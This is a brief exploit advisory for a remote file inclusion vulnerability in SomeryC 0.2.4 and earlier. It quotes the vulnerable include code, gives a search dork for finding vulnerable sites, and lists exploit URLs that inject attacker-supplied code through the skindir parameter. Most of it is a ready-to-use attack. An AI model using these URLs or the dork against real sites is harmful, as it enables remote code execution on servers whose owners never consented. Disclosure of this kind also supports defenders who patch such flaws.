SomeryC version 0.2.4 and below suffer from a remote file inclusion vulnerability.
c5e5c8b658ce213eb0a5de1599539fc9028a79a14201a044ff04feb737e07d71
### SomeryC <= v0.2.4 Remote File Include ###
#Vendor: http://someryc.mostpopularcomic.com
#download http://someryc.mostpopularcomic.com/sC024.zip
#found by: Katatafish (karatatata@hush.com)
#d0rk: "powered by someryc"
#vuln-code(/admin/system/include.php):
if ($start) {
....
include("$skindir/header.php");
}
....
include("$skindir/footer.php");
#exploit:
http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]